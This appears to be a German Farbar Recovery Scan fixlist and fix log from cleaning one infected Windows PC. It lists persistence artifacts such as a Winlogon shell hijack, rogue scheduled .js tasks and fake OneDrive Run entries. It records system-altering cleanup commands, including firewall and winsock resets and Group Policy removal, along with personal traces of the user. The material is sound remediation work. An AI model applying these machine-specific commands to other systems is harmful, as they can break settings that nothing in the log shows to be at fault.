ShellIconOverlayIdentifiers-x32: [ OneDrive3] -> {A78ED123-AB77-406B-9962-2A5D9D2F7F30} => -> Keine Datei
ShellIconOverlayIdentifiers-x32: [ OneDrive4] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} => -> Keine Datei
ShellIconOverlayIdentifiers-x32: [ OneDrive5] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => -> Keine Datei
ShellIconOverlayIdentifiers-x32: [ OneDrive6] -> {9AA2F32D-362A-42D9-9328-24A483E2CCC3} => -> Keine Datei
ShellIconOverlayIdentifiers-x32: [ OneDrive7] -> {C5FF006E-2AE9-408C-B85B-2DFDD5449D9C} => -> Keine Datei
ContextMenuHandlers6: [ContMenu] -> {FCF608CF-5716-47C3-A1A8-991D873AF72B} => -> Keine Datei
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page =
HKU\S-1-5-21-3460856420-2582145234-728948223-1001\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKU\S-1-5-21-4143643995-367336108-808576433-1107\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
BHO: Kein Name -> {1DAC0C53-7D23-4AB3-856A-B04D98CD982A} -> Keine Datei
BHO-x32: Kein Name -> {1DAC0C53-7D23-4AB3-856A-B04D98CD982A} -> Keine Datei
Toolbar: HKLM - Kein Name - {1DAC0C53-7D23-4AB3-856A-B04D98CD982A} - Keine Datei
Toolbar: HKLM-x32 - Kein Name - {1DAC0C53-7D23-4AB3-856A-B04D98CD982A} - Keine Datei
HKU\S-1-5-21-4143643995-367336108-808576433-1107\...\StartupApproved\Run: => "OneDrive GsAofCNyJa"
HKU\S-1-5-21-4143643995-367336108-808576433-1107\...\StartupApproved\Run: => "OneDrive ShidVxuBhh"
HKU\S-1-5-21-4143643995-367336108-808576433-1107\...\StartupApproved\StartupFolder: => "AppData.exe"
C:\Users\AllUserName\AppData\Roaming\Deskt.exe
C:\Users\AllUserName\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Desktop.exe
HKLM-x32\...\Run: [] => [X]
HKU\S-1-5-21-4143643995-367336108-808576433-1107\...\Run: [AdobeBridge] => [X]
HKU\S-1-5-21-4143643995-367336108-808576433-1107\...\Run: [] => [X]
HKU\S-1-5-21-4143643995-367336108-808576433-1107\...\Winlogon: [Shell] explorer.exe,C:\Users\user.domäne\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Programs\AppData.exe, <==== ACHTUNG
File: C:\Users\user.domäne\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Programs\AppData.exe
C:\Users\user.domäne\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Programs
HKLM\Software\...\Authentication\Credential Providers: [{C885AA15-1764-4293-B82A-0586ADD46B35}] ->
Task: {9FA8515B-F007-4624-90D9-859C02C34812} - System32\Tasks\Microsoft\Windows\GroupPolicy\{3E0A038B-D834-4930-9981-E89C9BFF83AA} => C:\WINDOWS\system32\gpupdate.exe [53248 2024-03-14] (Microsoft Windows -> Microsoft Corporation)
Task: {F9E3B3CF-1D15-41B5-8765-D0ADC55474D5} - System32\Tasks\Microsoft\Windows\GroupPolicy\{A7719E0F-10DB-4640-AD8C-490CC6AD5202} => C:\WINDOWS\system32\gpupdate.exe [53248 2024-03-14] (Microsoft Windows -> Microsoft Corporation)
StartupDir: %USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Programs <==== ACHTUNG
GroupPolicy: Beschränkung ? <==== ACHTUNG
Policies: C:\ProgramData\NTUSER.pol: Beschränkung <==== ACHTUNG
HKLM\SOFTWARE\Policies\Microsoft\Edge: Beschränkung <==== ACHTUNG
Task: {E5CDE7D5-8E9C-4E6A-8F23-5180D9D79571} - System32\Tasks\IUM-F1E24CA0-B63E-4F13-A9E3-4ADE3BFF3473 => C:\Program Files (x86)\Intel\Intel(R) Update Manager\bin\iumsvc.exe --automatic (Keine Datei)
Task: {CCDFC0B8-01A3-4E74-A820-4F13F51D269E} - System32\Tasks\Microsoft\Windows\Mobile Broadband Accounts\MNO Metadata Parser => %SystemRoot%\System32\MbaeParserTask.exe (Keine Datei)
Task: {5E0AD918-FE0B-47F9-BE79-CE17564845EC} - System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Reboot_AC => %systemroot%\system32\MusNotification.exe /RunOnAC RebootDialog (Keine Datei)
Task: {58D77E8D-A3B3-4C34-B5E7-D9737015349A} - System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Reboot_Battery => %systemroot%\system32\MusNotification.exe /RunOnBattery RebootDialog (Keine Datei)
Task: {E0F10DCF-44AD-40E8-9370-FB5DA59F93FB} - System32\Tasks\Microsoft\Windows\UpdateOrchestrator\USO_UxBroker => %systemroot%\system32\MusNotification.exe (Keine Datei)
CMD: type "C:\Users\user.domäne\AppData\Roaming\Microsoft\Windows\Templates\puTcVzRKiKPfhBC.js"
CMD: type "C:\Users\user.domäne\AppData\Roaming\Microsoft\Windows\Templates\yRkawdXSgdbJmzp.js"
Task: {62BCCF6C-F99B-4298-802F-F4E862B9E379} - System32\Tasks\puTcVzRKiKPfhBC => C:\Users\user.domäne\AppData\Roaming\Microsoft\Windows\Templates\puTcVzRKiKPfhBC.js [1424 2024-03-24] () [Datei ist nicht signiert] <==== ACHTUNG
Task: {97E873B8-E0BC-4E2C-A97B-2BFF2CD6D8E6} - System32\Tasks\yRkawdXSgdbJmzp => C:\Users\user.domäne\AppData\Roaming\Microsoft\Windows\Templates\yRkawdXSgdbJmzp.js [1424 2024-03-24] () [Datei ist nicht signiert] <==== ACHTUNG
File: C:\Users\user.domäne\AppData\Roaming\Microsoft\Windows\Templates\puTcVzRKiKPfhBC.js
C:\Users\user.domäne\AppData\Roaming\Microsoft\Windows\Templates\puTcVzRKiKPfhBC.js
File: C:\Users\user.domäne\AppData\Roaming\Microsoft\Windows\Templates\yRkawdXSgdbJmzp.js
C:\Users\user.domäne\AppData\Roaming\Microsoft\Windows\Templates\yRkawdXSgdbJmzp.js
Edge Notifications: Default -> hxxps://web.whatsapp.com
CHR Notifications: Default -> hxxps://app.sipgate.com; hxxps://calendar.google.com; hxxps://community.symcon.de; hxxps://forum-ukraine.de; hxxps://forum.fritzing.org; hxxps://kundenbereich.check24.de; hxxps://nas.domäne.com; hxxps://web.telegram.org; hxxps://www.facebook.com; hxxps://www.instagram.com; hxxps://www.lieferando.de; hxxps://www.romeo.com; hxxps://www.scenic-forum.de
FF user.js: detected! => C:\Users\user.domäne\AppData\Roaming\Mozilla\Firefox\Profiles\5pbxmky2.default\user.js [2023-06-10]
FF user.js: detected! => C:\Users\user.domäne\AppData\Roaming\Mozilla\Firefox\Profiles\37niltkt.default-release\user.js [2023-06-10]
FF HKLM\...\Firefox\Extensions: [bdwtwe@bitdefender.com] - C:\Program Files\Bitdefender\Bitdefender Security\bdwteff.xpi => nicht gefunden
FF HKLM-x32\...\Firefox\Extensions: [bdwtwe@bitdefender.com] - C:\Program Files\Bitdefender\Bitdefender Security\bdwteff.xpi => nicht gefunden
S3 semav6msr64; \??\C:\Windows\system32\drivers\semav6msr64.sys [X]
2021-05-04 04:00 - 2021-05-09 16:01 - 000000128 ____H () C:\Users\user.domäne\AppData\Roaming\ecf00c38dc807e105d881c433a6b455dd2c606b6
2024-03-24 23:08 - 2022-11-04 06:02 - 000069632 _____ (Microsoft Corporation) C:\Users\user.domäne\AppData\Roaming\MSBuild.exe
2024-03-24 23:09 - 2022-11-04 06:02 - 000032768 _____ (Microsoft Corporation) C:\Users\user.domäne\AppData\Roaming\RegSvcs.exe
Unlock: C:\Users\user.domäne\AppData\Roaming\Microsoft\Teams
2023-03-11 19:31 - 2023-03-11 19:31 - 000000069 _____ () C:\Program Files (x86)\dialogysclip.bat
2023-03-11 19:29 - 2023-03-11 19:55 - 000001785 _____ () C:\Program Files (x86)\DialogysUninstWPS.bat
2022-02-26 14:35 - 2022-02-26 14:35 - 000000030 _____ () C:\Program Files (x86)\Exiferupdate.ini
2023-03-11 19:29 - 2023-03-11 19:29 - 000000844 _____ () C:\Program Files (x86)\INSTALL.LOG
2023-10-07 17:08 - 2023-10-07 17:08 - 000001082 _____ () C:\Program Files (x86)\MacroRecorder.lnk
2023-03-11 19:29 - 2017-11-08 16:09 - 000176040 _____ () C:\Program Files (x86)\UninstScript.EXE
2021-05-04 04:00 - 2021-05-09 16:01 - 000000128 ____H () C:\Users\user.domäne\AppData\Roaming\ecf00c38dc807e105d881c433a6b455dd2c606b6
2024-03-24 23:08 - 2022-11-04 06:02 - 000069632 _____ (Microsoft Corporation) C:\Users\user.domäne\AppData\Roaming\MSBuild.exe
2024-03-24 23:09 - 2022-11-04 06:02 - 000032768 _____ (Microsoft Corporation) C:\Users\user.domäne\AppData\Roaming\RegSvcs.exe
2024-03-11 15:12 - 2024-03-11 15:12 - 000174062 _____ () C:\Users\user.domäne\AppData\Roaming\rvhost.vbe.zaak
2021-02-03 04:26 - 2024-03-19 21:50 - 000000128 _____ () C:\Users\user.domäne\AppData\Roaming\winscp.rnd
2022-09-25 10:16 - 2022-09-25 10:35 - 001163406 _____ () C:\Users\user.domäne\AppData\Roaming\WrapAnGo_Install.log
2021-12-19 16:02 - 2021-12-19 16:02 - 000001456 _____ () C:\Users\user.domäne\AppData\Local\Adobe Für Web speichern 13.0 Prefs
2021-02-03 06:28 - 2021-10-29 18:02 - 000018432 _____ () C:\Users\user.domäne\AppData\Local\https_www.amazon.de_0.localstorage
2022-08-21 05:36 - 2022-08-21 05:36 - 000000000 _____ () C:\Users\user.domäne\AppData\Local\{9F850872-AAD4-4482-A31A-2969AE3AEF22}
CMD: reg query "HKCU\Software\yRkawdXSgdbJmzp" /S
DeleteKey: HKCU\Software\yRkawdXSgdbJmzp
CMD: reg query "HKCU\Software\3cec14c682a69cb8fafb5026acd55133" /S
DeleteKey: HKCU\Software\3cec14c682a69cb8fafb5026acd55133
CMD: reg query "HKCU\Software"
CMD: reg query "HKLM\Software" /reg:32
CMD: reg query "HKLM\Software" /reg:64
CMD: dir /A "c:\users\public"
CMD: dir /A "C:\Users\user.domäne"
CMD: cscript /nologo %systemroot%\System32\slmgr.vbs /dlv
CMD: netsh winsock reset
CMD: netsh advfirewall reset
CMD: netsh advfirewall set allprofiles state ON
CMD: netsh winhttp reset proxy
CMD: Bitsadmin /Reset /Allusers
CMD: Winmgmt /salvagerepository
CMD: Winmgmt /verifyrepository
CMD: "%WINDIR%\SYSTEM32\lodctr.exe" /R
CMD: "%WINDIR%\SysWOW64\lodctr.exe" /R
CMD: "%WINDIR%\SYSTEM32\lodctr.exe" /R
CMD: "%WINDIR%\SysWOW64\lodctr.exe" /R
Hosts:
RemoveProxy:
EmptyTemp:
End::
*****************

SystemRestore: On => abgeschlossen
Wiederherstellungspunkt wurde erfolgreich erstellt.
Prozesse erfolgreich geschlossen.
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ OneDrive1 => erfolgreich entfernt
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ OneDrive2 => erfolgreich entfernt
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ OneDrive3 => erfolgreich entfernt
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ OneDrive4 => erfolgreich entfernt
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ OneDrive5 => erfolgreich entfernt
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ OneDrive6 => erfolgreich entfernt
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ OneDrive7 => erfolgreich entfernt
HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ OneDrive1 => erfolgreich entfernt
HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ OneDrive2 => erfolgreich entfernt
HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ OneDrive3 => erfolgreich entfernt
HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ OneDrive4 => erfolgreich entfernt
HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ OneDrive5 => erfolgreich entfernt
HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ OneDrive6 => erfolgreich entfernt
HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ OneDrive7 => erfolgreich entfernt
HKLM\Software\Classes\Folder\ShellEx\ContextMenuHandlers\ContMenu => erfolgreich entfernt
HKLM\Software\\Microsoft\Internet Explorer\Main\\"Start Page"="hxxp://go.microsoft.com/fwlink/?LinkId=69157" => Wert erfolgreich wiederhergestellt
HKU\S-1-5-21-3460856420-2582145234-728948223-1001\Software\Microsoft\Internet Explorer\Main\\"Start Page"="hxxp://go.microsoft.com/fwlink/?LinkId=69157" => Wert erfolgreich wiederhergestellt
HKU\S-1-5-21-4143643995-367336108-808576433-1107\Software\Microsoft\Internet Explorer\Main\\"Start Page"="hxxp://go.microsoft.com/fwlink/?LinkId=69157" => Wert erfolgreich wiederhergestellt
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{1DAC0C53-7D23-4AB3-856A-B04D98CD982A} => erfolgreich entfernt
HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{1DAC0C53-7D23-4AB3-856A-B04D98CD982A} => erfolgreich entfernt
"HKLM\SOFTWARE\Microsoft\Internet Explorer\Toolbar\\{1DAC0C53-7D23-4AB3-856A-B04D98CD982A}" => erfolgreich entfernt
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Toolbar\\{1DAC0C53-7D23-4AB3-856A-B04D98CD982A}" => erfolgreich entfernt
"HKU\S-1-5-21-4143643995-367336108-808576433-1107\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run\\OneDrive GsAofCNyJa" => erfolgreich entfernt
"HKU\S-1-5-21-4143643995-367336108-808576433-1107\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\\OneDrive GsAofCNyJa" => nicht gefunden
"HKU\S-1-5-21-4143643995-367336108-808576433-1107\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run\\OneDrive ShidVxuBhh" => erfolgreich entfernt
"HKU\S-1-5-21-4143643995-367336108-808576433-1107\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\\OneDrive ShidVxuBhh" => nicht gefunden
"C:\Users\user.domäne\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Programs\AppData.exe" => nicht gefunden
"HKU\S-1-5-21-4143643995-367336108-808576433-1107\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\StartupFolder\\AppData.exe" => erfolgreich entfernt
"C:\Users\ProgramData\AppData\Roaming\Deskt.exe" => nicht gefunden
"C:\Users\Default\AppData\Roaming\Deskt.exe" => nicht gefunden
"C:\Users\DefaultAppPool\AppData\Roaming\Deskt.exe" => nicht gefunden
"C:\Users\Public\AppData\Roaming\Deskt.exe" => nicht gefunden
"C:\Users\Thomas\AppData\Roaming\Deskt.exe" => nicht gefunden
"C:\Users\user.domäne\AppData\Roaming\Deskt.exe" => nicht gefunden
"C:\Users\ProgramData\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Desktop.exe" => nicht gefunden
"C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Desktop.exe" => nicht gefunden
"C:\Users\DefaultAppPool\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Desktop.exe" => nicht gefunden
"C:\Users\Public\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Desktop.exe" => nicht gefunden
"C:\Users\Thomas\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Desktop.exe" => nicht gefunden
"C:\Users\user.domäne\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Desktop.exe" => nicht gefunden
"HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\" => erfolgreich entfernt
"HKU\S-1-5-21-4143643995-367336108-808576433-1107\Software\Microsoft\Windows\CurrentVersion\Run\\AdobeBridge" => erfolgreich entfernt
"HKU\S-1-5-21-4143643995-367336108-808576433-1107\Software\Microsoft\Windows\CurrentVersion\Run\\" => erfolgreich entfernt
"HKU\S-1-5-21-4143643995-367336108-808576433-1107\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell" => nicht gefunden

========================= File: C:\Users\user.domäne\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Programs\AppData.exe ========================

"C:\Users\user.domäne\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Programs\AppData.exe" => nicht gefunden
====== Ende von File: ======


"C:\Users\user.domäne\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Programs" Ordner verschieben:

C:\Users\user.domäne\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Programs => erfolgreich verschoben
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\Credential Providers\{C885AA15-1764-4293-B82A-0586ADD46B35} => erfolgreich entfernt
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{9FA8515B-F007-4624-90D9-859C02C34812}" => erfolgreich entfernt
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{9FA8515B-F007-4624-90D9-859C02C34812}" => erfolgreich entfernt
C:\WINDOWS\System32\Tasks\Microsoft\Windows\GroupPolicy\{3E0A038B-D834-4930-9981-E89C9BFF83AA} => erfolgreich verschoben
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\GroupPolicy\{3E0A038B-D834-4930-9981-E89C9BFF83AA}" => erfolgreich entfernt
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{F9E3B3CF-1D15-41B5-8765-D0ADC55474D5}" => erfolgreich entfernt
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{F9E3B3CF-1D15-41B5-8765-D0ADC55474D5}" => erfolgreich entfernt
C:\WINDOWS\System32\Tasks\Microsoft\Windows\GroupPolicy\{A7719E0F-10DB-4640-AD8C-490CC6AD5202} => erfolgreich verschoben
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\GroupPolicy\{A7719E0F-10DB-4640-AD8C-490CC6AD5202}" => erfolgreich entfernt
StartupDir: %USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Programs <==== ACHTUNG => erfolgreich wiederhergestellt

"C:\WINDOWS\system32\GroupPolicy\Machine" Ordner verschieben:

C:\WINDOWS\system32\GroupPolicy\Machine => erfolgreich verschoben
C:\WINDOWS\system32\GroupPolicy\GPT.ini => erfolgreich verschoben
C:\WINDOWS\SysWOW64\GroupPolicy\GPT.ini => erfolgreich verschoben
C:\ProgramData\NTUSER.pol => erfolgreich verschoben
HKLM\SOFTWARE\Policies\Microsoft\Edge => erfolgreich entfernt
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{E5CDE7D5-8E9C-4E6A-8F23-5180D9D79571}" => erfolgreich entfernt
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E5CDE7D5-8E9C-4E6A-8F23-5180D9D79571}" => erfolgreich entfernt
C:\WINDOWS\System32\Tasks\IUM-F1E24CA0-B63E-4F13-A9E3-4ADE3BFF3473 => erfolgreich verschoben
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\IUM-F1E24CA0-B63E-4F13-A9E3-4ADE3BFF3473" => erfolgreich entfernt
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{CCDFC0B8-01A3-4E74-A820-4F13F51D269E}" => erfolgreich entfernt
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{CCDFC0B8-01A3-4E74-A820-4F13F51D269E}" => erfolgreich entfernt
C:\WINDOWS\System32\Tasks\Microsoft\Windows\Mobile Broadband Accounts\MNO Metadata Parser => erfolgreich verschoben
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Mobile Broadband Accounts\MNO Metadata Parser" => erfolgreich entfernt
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{5E0AD918-FE0B-47F9-BE79-CE17564845EC}" => erfolgreich entfernt
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{5E0AD918-FE0B-47F9-BE79-CE17564845EC}" => erfolgreich entfernt
C:\WINDOWS\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Reboot_AC => erfolgreich verschoben
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\UpdateOrchestrator\Reboot_AC" => erfolgreich entfernt
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{58D77E8D-A3B3-4C34-B5E7-D9737015349A}" => erfolgreich entfernt
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{58D77E8D-A3B3-4C34-B5E7-D9737015349A}" => erfolgreich entfernt
C:\WINDOWS\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Reboot_Battery => erfolgreich verschoben
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\UpdateOrchestrator\Reboot_Battery" => erfolgreich entfernt
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{E0F10DCF-44AD-40E8-9370-FB5DA59F93FB}" => erfolgreich entfernt
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E0F10DCF-44AD-40E8-9370-FB5DA59F93FB}" => erfolgreich entfernt
C:\WINDOWS\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\USO_UxBroker => erfolgreich verschoben
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\UpdateOrchestrator\USO_UxBroker" => erfolgreich entfernt

========= type "C:\Users\user.domäne\AppData\Roaming\Microsoft\Windows\Templates\puTcVzRKiKPfhBC.js" =========

Das System kann die angegebene Datei nicht finden.


========= Ende von CMD: =========


========= type "C:\Users\user.domäne\AppData\Roaming\Microsoft\Windows\Templates\yRkawdXSgdbJmzp.js" =========

Das System kann die angegebene Datei nicht finden.


========= Ende von CMD: =========

"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{62BCCF6C-F99B-4298-802F-F4E862B9E379}" => erfolgreich entfernt
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{62BCCF6C-F99B-4298-802F-F4E862B9E379}" => nicht gefunden
C:\WINDOWS\System32\Tasks\puTcVzRKiKPfhBC => erfolgreich verschoben
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\puTcVzRKiKPfhBC" => nicht gefunden
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{97E873B8-E0BC-4E2C-A97B-2BFF2CD6D8E6}" => erfolgreich entfernt
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{97E873B8-E0BC-4E2C-A97B-2BFF2CD6D8E6}" => nicht gefunden
C:\WINDOWS\System32\Tasks\yRkawdXSgdbJmzp => erfolgreich verschoben
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\yRkawdXSgdbJmzp" => nicht gefunden

========================= File: C:\Users\user.domäne\AppData\Roaming\Microsoft\Windows\Templates\puTcVzRKiKPfhBC.js ========================

"C:\Users\user.domäne\AppData\Roaming\Microsoft\Windows\Templates\puTcVzRKiKPfhBC.js" => nicht gefunden
====== Ende von File: ======

"C:\Users\user.domäne\AppData\Roaming\Microsoft\Windows\Templates\puTcVzRKiKPfhBC.js" => nicht gefunden

========================= File: C:\Users\user.domäne\AppData\Roaming\Microsoft\Windows\Templates\yRkawdXSgdbJmzp.js ========================

"C:\Users\user.domäne\AppData\Roaming\Microsoft\Windows\Templates\yRkawdXSgdbJmzp.js" => nicht gefunden
====== Ende von File: ======

"C:\Users\user.domäne\AppData\Roaming\Microsoft\Windows\Templates\yRkawdXSgdbJmzp.js" => nicht gefunden
"Edge Notifications" => erfolgreich entfernt
"Chrome Notifications" => erfolgreich entfernt
C:\Users\user.domäne\AppData\Roaming\Mozilla\Firefox\Profiles\5pbxmky2.default\user.js => erfolgreich verschoben
C:\Users\user.domäne\AppData\Roaming\Mozilla\Firefox\Profiles\37niltkt.default-release\user.js => erfolgreich verschoben
"HKLM\Software\Mozilla\Firefox\Extensions\\bdwtwe@bitdefender.com" => erfolgreich entfernt
"HKLM\Software\Wow6432Node\Mozilla\Firefox\Extensions\\bdwtwe@bitdefender.com" => erfolgreich entfernt
HKLM\System\CurrentControlSet\Services\semav6msr64 => erfolgreich entfernt
semav6msr64 => Dienst erfolgreich entfernt
C:\Users\user.domäne\AppData\Roaming\ecf00c38dc807e105d881c433a6b455dd2c606b6 => erfolgreich verschoben
C:\Users\user.domäne\AppData\Roaming\MSBuild.exe => erfolgreich verschoben
C:\Users\user.domäne\AppData\Roaming\RegSvcs.exe => erfolgreich verschoben
"C:\Users\user.domäne\AppData\Roaming\Microsoft\Teams" => wurde entsperrt
C:\Program Files (x86)\dialogysclip.bat => erfolgreich verschoben
C:\Program Files (x86)\DialogysUninstWPS.bat => erfolgreich verschoben
C:\Program Files (x86)\Exiferupdate.ini => erfolgreich verschoben
C:\Program Files (x86)\INSTALL.LOG => erfolgreich verschoben
C:\Program Files (x86)\MacroRecorder.lnk => erfolgreich verschoben
C:\Program Files (x86)\UninstScript.EXE => erfolgreich verschoben
"C:\Users\user.domäne\AppData\Roaming\ecf00c38dc807e105d881c433a6b455dd2c606b6" => nicht gefunden
"C:\Users\user.domäne\AppData\Roaming\MSBuild.exe" => nicht gefunden
"C:\Users\user.domäne\AppData\Roaming\RegSvcs.exe" => nicht gefunden
C:\Users\user.domäne\AppData\Roaming\rvhost.vbe.zaak => erfolgreich verschoben
C:\Users\user.domäne\AppData\Roaming\winscp.rnd => erfolgreich verschoben
C:\Users\user.domäne\AppData\Roaming\WrapAnGo_Install.log => erfolgreich verschoben
"C:\Users\user.domäne\AppData\Local\Adobe Für Web speichern 13.0 Prefs" => nicht gefunden
C:\Users\user.domäne\AppData\Local\https_www.amazon.de_0.localstorage => erfolgreich verschoben
C:\Users\user.domäne\AppData\Local\{9F850872-AAD4-4482-A31A-2969AE3AEF22} => erfolgreich verschoben

========= reg query "HKCU\Software\yRkawdXSgdbJmzp" /S =========

FEHLER: Der angegebene Registrierungsschlssel bzw. Wert wurde nicht gefunden.


========= Ende von CMD: =========

HKCU\Software\yRkawdXSgdbJmzp => nicht gefunden

========= reg query "HKCU\Software\3cec14c682a69cb8fafb5026acd55133" /S =========

FEHLER: Der angegebene Registrierungsschlssel bzw. Wert wurde nicht gefunden.


========= Ende von CMD: =========

HKCU\Software\3cec14c682a69cb8fafb5026acd55133 => nicht gefunden

========= reg query "HKCU\Software" =========


HKEY_CURRENT_USER\Software
    (Standard)    REG_SZ    

HKEY_CURRENT_USER\Software\4kdownload.com
HKEY_CURRENT_USER\Software\7-Zip
HKEY_CURRENT_USER\Software\ABBYY
HKEY_CURRENT_USER\Software\Acronis
HKEY_CURRENT_USER\Software\Adobe
HKEY_CURRENT_USER\Software\Adobe Lightroom
HKEY_CURRENT_USER\Software\Akeo Consulting
HKEY_CURRENT_USER\Software\appdatalow
HKEY_CURRENT_USER\Software\Apple Inc.
HKEY_CURRENT_USER\Software\Ashampoo
HKEY_CURRENT_USER\Software\ASPOA GmbH
HKEY_CURRENT_USER\Software\Aura
HKEY_CURRENT_USER\Software\Autodesk
HKEY_CURRENT_USER\Software\Avast Software
HKEY_CURRENT_USER\Software\AVM
HKEY_CURRENT_USER\Software\Azureus
HKEY_CURRENT_USER\Software\B0A95C82BA6D3B5A9F4A
HKEY_CURRENT_USER\Software\bis
HKEY_CURRENT_USER\Software\Bitdefender Anti Tracker
HKEY_CURRENT_USER\Software\Bitdefender VPN
HKEY_CURRENT_USER\Software\Blackmagic Design
HKEY_CURRENT_USER\Software\Blender Foundation
HKEY_CURRENT_USER\Software\Borland
HKEY_CURRENT_USER\Software\BranchIO
HKEY_CURRENT_USER\Software\Brother Industries, Ltd.
HKEY_CURRENT_USER\Software\BugSplat
HKEY_CURRENT_USER\Software\Buhl Data Service GmbH
HKEY_CURRENT_USER\Software\Canon
HKEY_CURRENT_USER\Software\Canon Electronics Inc.
HKEY_CURRENT_USER\Software\ChangeTracker
HKEY_CURRENT_USER\Software\Chromium
HKEY_CURRENT_USER\Software\Citrix
HKEY_CURRENT_USER\Software\Clients
HKEY_CURRENT_USER\Software\ClockworkMod
HKEY_CURRENT_USER\Software\Cygnus Solutions
HKEY_CURRENT_USER\Software\Cygwin
HKEY_CURRENT_USER\Software\DATAKAM PLAYER
HKEY_CURRENT_USER\Software\DBFViewer2000
